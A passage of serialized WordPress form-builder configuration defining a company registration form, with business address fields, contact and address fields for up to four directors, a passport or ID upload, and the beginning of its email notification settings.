ld_6884911\";s:4:\"16:2\";s:11:\"fld_5557447\";s:4:\"17:1\";s:11:\"fld_8041739\";s:4:\"17:1\";s:11:\"fld_2927445\";s:4:\"17:2\";s:11:\"fld_2783041\";s:4:\"17:2\";s:11:\"fld_8323347\";s:4:\"18:1\";s:11:\"fld_9217608\";s:4:\"19:1\";s:11:\"fld_6098585\";s:4:\"20:1\";s:11:\"fld_2034410\";s:4:\"20:1\";s:11:\"fld_6028157\";s:4:\"20:2\";s:11:\"fld_7792983\";s:4:\"21:1\";s:11:\"fld_7588887\";s:4:\"21:1\";s:11:\"fld_5382021\";s:4:\"21:2\";s:11:\"fld_3709033\";s:4:\"21:2\";s:11:\"fld_4901447\";s:4:\"22:1\";s:11:\"fld_7881401\";s:4:\"23:1\";s:10:\"fld_734537\";s:4:\"24:1\";s:10:\"fld_615114\";s:4:\"25:1\";s:11:\"fld_6786328\";s:4:\"25:1\";}s:9:\"structure\";s:85:\"6:6|12|6:6|12|6:6|12|12|6:6|6:6|12|12|6:6|6:6|12|12|6:6|6:6|12|12|6:6|6:6|12|12|12|12\";}s:6:\"fields\";a:49:{s:11:\"fld_8851747\";a:7:{s:2:\"ID\";s:11:\"fld_8851747\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Insert Date\";s:4:\"slug\";s:11:\"insert_date\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:8:\"yy-mm-dd\";}}s:11:\"fld_6562030\";a:8:{s:2:\"ID\";s:11:\"fld_6562030\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:21:\"Proposed Company Name\";s:4:\"slug\";s:21:\"proposed_company_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:246:\"Provide at least 3-4 names each on a new line. Try different names rather than different variations of the same name. Note if the name is not available this may cause delays in the registration of the company; i.e. until a suitable name is found.\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:4;s:7:\"default\";s:0:\"\";}}s:11:\"fld_9988349\";a:7:{s:2:\"ID\";s:11:\"fld_9988349\";s:4:\"type\";s:8:\"dropdown\";s:5:\"label\";s:34:\"How many directors in the company:\";s:4:\"slug\";s:33:\"how_many_directors_in_the_company\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:201:\"If there are more than 4 directors; complete the details for the first 4 directors and email the remaining directors details, as per 2nd director requirements below, to store@companyregistration.online\";s:6:\"config\";a:12:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:14:\"default_option\";s:0:\"\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:11:\"orderby_tax\";s:4:\"name\";s:12:\"orderby_post\";s:4:\"name\";s:5:\"order\";s:3:\"ASC\";s:7:\"default\";s:9:\"opt928513\";s:6:\"option\";a:4:{s:9:\"opt928513\";a:3:{s:10:\"calc_value\";s:3:\"One\";s:5:\"value\";s:3:\"One\";s:5:\"label\";s:3:\"One\";}s:10:\"opt1518591\";a:3:{s:10:\"calc_value\";s:3:\"Two\";s:5:\"value\";s:3:\"Two\";s:5:\"label\";s:3:\"Two\";}s:10:\"opt2755045\";a:3:{s:10:\"calc_value\";s:5:\"Three\";s:5:\"value\";s:5:\"Three\";s:5:\"label\";s:5:\"Three\";}s:10:\"opt3630013\";a:3:{s:10:\"calc_value\";s:4:\"Four\";s:5:\"value\";s:4:\"Four\";s:5:\"label\";s:4:\"Four\";}}}}s:11:\"fld_2828361\";a:8:{s:2:\"ID\";s:11:\"fld_2828361\";s:4:\"type\";s:8:\"dropdown\";s:5:\"label\";s:31:\"Do you have a business address?\";s:4:\"slug\";s:30:\"do_you_have_a_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:169:\"If not, select \'No\', the home address of the 1st Director will used as the business address. This can be changed and should be changed once your business has an address.\";s:6:\"config\";a:13:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:14:\"default_option\";s:0:\"\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:11:\"orderby_tax\";s:4:\"name\";s:12:\"orderby_post\";s:4:\"name\";s:5:\"order\";s:3:\"ASC\";s:11:\"show_values\";i:1;s:7:\"default\";s:10:\"opt2058635\";s:6:\"option\";a:2:{s:10:\"opt2058635\";a:3:{s:10:\"calc_value\";s:0:\"\";s:5:\"value\";s:3:\"Yes\";s:5:\"label\";s:3:\"Yes\";}s:10:\"opt1317836\";a:3:{s:10:\"calc_value\";s:0:\"\";s:5:\"value\";s:2:\"No\";s:5:\"label\";s:2:\"No\";}}}}s:10:\"fld_844275\";a:7:{s:2:\"ID\";s:10:\"fld_844275\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:16:\"Business Details\";s:4:\"slug\";s:16:\"business_details\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_2805061499476255\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:62:\"<h2><span style=\"color: #3366ff;\">Business Details</span></h2>\";}}s:11:\"fld_8860272\";a:8:{s:2:\"ID\";s:11:\"fld_8860272\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:31:\"Physical Address of the Company\";s:4:\"slug\";s:31:\"physical_address_of_the_company\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_2805061499476255\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street Address\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_7471073\";a:8:{s:2:\"ID\";s:11:\"fld_7471073\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:24:\"City of business address\";s:4:\"slug\";s:28:\"province_of_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_2805061499476255\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:4:\"City\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_1282952\";a:8:{s:2:\"ID\";s:11:\"fld_1282952\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:18:\"Suburb of business\";s:4:\"slug\";s:18:\"suburb_of_business\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_2805061499476255\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_9752837\";a:8:{s:2:\"ID\";s:11:\"fld_9752837\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:31:\"Postal Code of business address\";s:4:\"slug\";s:31:\"postal_code_of_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_2805061499476255\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:6:\"number\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;}}s:11:\"fld_4904638\";a:7:{s:2:\"ID\";s:11:\"fld_4904638\";s:4:\"type\";s:13:\"section_break\";s:5:\"label\";s:9:\"Section 1\";s:4:\"slug\";s:9:\"section_1\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:5:\"width\";s:0:\"\";}}s:10:\"fld_331127\";a:7:{s:2:\"ID\";s:10:\"fld_331127\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:22:\"1st Director\'s Details\";s:4:\"slug\";s:21:\"1st_directors_details\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:67:\"<h2><span style=\"color: #3366ff;\">1st Directors Details</span></h2>\";}}s:11:\"fld_4045814\";a:8:{s:2:\"ID\";s:11:\"fld_4045814\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:40:\"Incorporator or 1st Director\'s Full Name\";s:4:\"slug\";s:39:\"incorporator_or_1st_directors_full_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:66:\"The incorporator and the 1st Director is generally the same person\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:22:\"NB: Full name required\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_1029156\";a:7:{s:2:\"ID\";s:11:\"fld_1029156\";s:4:\"type\";s:12:\"phone_better\";s:5:\"label\";s:11:\"Cell Number\";s:4:\"slug\";s:13:\"cell_number10\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_3880152\";a:8:{s:2:\"ID\";s:11:\"fld_3880152\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:21:\"Physical Home Address\";s:4:\"slug\";s:22:\"physical_home_address1\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street address\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_8674929\";a:8:{s:2:\"ID\";s:11:\"fld_8674929\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:4:\"City\";s:4:\"slug\";s:5:\"city1\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:4:\"City\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:10:\"fld_132545\";a:8:{s:2:\"ID\";s:10:\"fld_132545\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:6:\"Suburb\";s:4:\"slug\";s:7:\"suburb1\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_9364351\";a:8:{s:2:\"ID\";s:11:\"fld_9364351\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Postal Code\";s:4:\"slug\";s:14:\"postal_codeone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;}}s:11:\"fld_4038678\";a:7:{s:2:\"ID\";s:11:\"fld_4038678\";s:4:\"type\";s:13:\"section_break\";s:5:\"label\";s:10:\"Sections 2\";s:4:\"slug\";s:10:\"sections_2\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:5:\"width\";s:0:\"\";}}s:11:\"fld_2139079\";a:7:{s:2:\"ID\";s:11:\"fld_2139079\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:22:\"2nd Director\'s Details\";s:4:\"slug\";s:21:\"2nd_directors_details\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:67:\"<h2><span style=\"color: #3366ff;\">2nd Directors Details</span></h2>\";}}s:11:\"fld_8766963\";a:7:{s:2:\"ID\";s:11:\"fld_8766963\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Full Name\";s:4:\"slug\";s:10:\"full_name2\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_1344763\";a:7:{s:2:\"ID\";s:11:\"fld_1344763\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:14:\"email_address2\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_1898978\";a:7:{s:2:\"ID\";s:11:\"fld_1898978\";s:4:\"type\";s:12:\"phone_better\";s:5:\"label\";s:11:\"Cell Number\";s:4:\"slug\";s:13:\"cell_number22\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:10:\"fld_104167\";a:7:{s:2:\"ID\";s:10:\"fld_104167\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:21:\"Physical home address\";s:4:\"slug\";s:22:\"physical_home_address2\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_6931703\";a:7:{s:2:\"ID\";s:11:\"fld_6931703\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:4:\"City\";s:4:\"slug\";s:5:\"city2\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_4026549\";a:7:{s:2:\"ID\";s:11:\"fld_4026549\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:6:\"Suburb\";s:4:\"slug\";s:7:\"suburb2\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_2391905\";a:7:{s:2:\"ID\";s:11:\"fld_2391905\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Postal Code\";s:4:\"slug\";s:13:\"postal_code12\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_9180242064820795\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;}}s:11:\"fld_5755232\";a:7:{s:2:\"ID\";s:11:\"fld_5755232\";s:4:\"type\";s:13:\"section_break\";s:5:\"label\";s:9:\"Section 3\";s:4:\"slug\";s:9:\"section_3\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:5:\"width\";s:0:\"\";}}s:11:\"fld_8573429\";a:7:{s:2:\"ID\";s:11:\"fld_8573429\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:10:\"dIrector 3\";s:4:\"slug\";s:11:\"_director_3\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:67:\"<h2><span style=\"color: #3366ff;\">3rd Directors Details</span></h2>\";}}s:11:\"fld_8062310\";a:7:{s:2:\"ID\";s:11:\"fld_8062310\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:8:\"Ful Name\";s:4:\"slug\";s:9:\"ful_name3\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_8912745\";a:7:{s:2:\"ID\";s:11:\"fld_8912745\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:5:\"Email\";s:4:\"slug\";s:13:\"email_adress3\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_6884911\";a:7:{s:2:\"ID\";s:11:\"fld_6884911\";s:4:\"type\";s:12:\"phone_better\";s:5:\"label\";s:11:\"Cell Number\";s:4:\"slug\";s:13:\"cell_number33\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_5557447\";a:7:{s:2:\"ID\";s:11:\"fld_5557447\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:16:\"Physical Address\";s:4:\"slug\";s:17:\"physical_address3\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_8041739\";a:7:{s:2:\"ID\";s:11:\"fld_8041739\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:4:\"City\";s:4:\"slug\";s:5:\"city3\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_2927445\";a:7:{s:2:\"ID\";s:11:\"fld_2927445\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:6:\"Suburb\";s:4:\"slug\";s:7:\"suburb3\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_2783041\";a:7:{s:2:\"ID\";s:11:\"fld_2783041\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Postal Code\";s:4:\"slug\";s:13:\"postal_code13\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_1942555713747647\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;}}s:11:\"fld_8323347\";a:7:{s:2:\"ID\";s:11:\"fld_8323347\";s:4:\"type\";s:13:\"section_break\";s:5:\"label\";s:8:\"Section3\";s:4:\"slug\";s:8:\"section4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:5:\"width\";s:0:\"\";}}s:11:\"fld_9217608\";a:7:{s:2:\"ID\";s:11:\"fld_9217608\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:10:\"dIrector 4\";s:4:\"slug\";s:11:\"_director_4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:67:\"<h2><span style=\"color: #3366ff;\">4th Directors Details</span></h2>\";}}s:11:\"fld_6098585\";a:7:{s:2:\"ID\";s:11:\"fld_6098585\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Full Name\";s:4:\"slug\";s:10:\"full_name4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_2034410\";a:7:{s:2:\"ID\";s:11:\"fld_2034410\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:5:\"Email\";s:4:\"slug\";s:6:\"email4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_6028157\";a:7:{s:2:\"ID\";s:11:\"fld_6028157\";s:4:\"type\";s:12:\"phone_better\";s:5:\"label\";s:11:\"Cell Number\";s:4:\"slug\";s:13:\"cell_number44\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_7792983\";a:7:{s:2:\"ID\";s:11:\"fld_7792983\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:21:\"Physical Home Address\";s:4:\"slug\";s:22:\"physical_home_address4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_7588887\";a:7:{s:2:\"ID\";s:11:\"fld_7588887\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:4:\"City\";s:4:\"slug\";s:5:\"city4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_5382021\";a:7:{s:2:\"ID\";s:11:\"fld_5382021\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:6:\"Suburb\";s:4:\"slug\";s:7:\"suburb4\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";}}s:11:\"fld_3709033\";a:7:{s:2:\"ID\";s:11:\"fld_3709033\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Postal Code\";s:4:\"slug\";s:13:\"postal_code14\";s:10:\"conditions\";a:1:{s:4:\"type\";s:19:\"con_420314167051725\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;}}s:11:\"fld_4901447\";a:7:{s:2:\"ID\";s:11:\"fld_4901447\";s:4:\"type\";s:13:\"section_break\";s:5:\"label\";s:9:\"Section 5\";s:4:\"slug\";s:9:\"section_5\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:5:\"width\";s:0:\"\";}}s:11:\"fld_7881401\";a:7:{s:2:\"ID\";s:11:\"fld_7881401\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:11:\"Almost Done\";s:4:\"slug\";s:11:\"almost_done\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:102:\"<h2><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: #3366ff;\">Almost Done</span></h2>\";}}s:10:\"fld_734537\";a:8:{s:2:\"ID\";s:10:\"fld_734537\";s:4:\"type\";s:4:\"file\";s:5:\"label\";s:48:\"Upload certified copies of Director IDs/Passport\";s:4:\"slug\";s:47:\"upload_certified_copies_of_director_idspassport\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:142:\"If the upload files exceeds 2MB please email the file to store@companyregistration.online and use the 1st Director\'s full name as the subject.\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:6:\"attach\";i:1;s:12:\"multi_upload\";i:1;s:17:\"multi_upload_text\";s:6:\"Upload\";s:7:\"allowed\";s:0:\"\";}}s:10:\"fld_615114\";a:7:{s:2:\"ID\";s:10:\"fld_615114\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:7:\"Message\";s:4:\"slug\";s:7:\"message\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:167:\"<h2>Before you submit?</h2>\n<p>Review the details of your submission.\nPlease be patient, after you click submit the form it will take 20-30 seconds to upload </p>\n<hr>\";}}s:11:\"fld_6786328\";a:7:{s:2:\"ID\";s:11:\"fld_6786328\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:15:\"Click to submit\";s:4:\"slug\";s:15:\"click_to_submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:11:\"label_space\";i:1;s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:10:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:76:\"Website: Company Registration Form %incorporator_or_1st_directors_full_name%\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:8:\"reply_to\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";s:8:\"csv_data\";i:1;s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:25:\"Company Registration 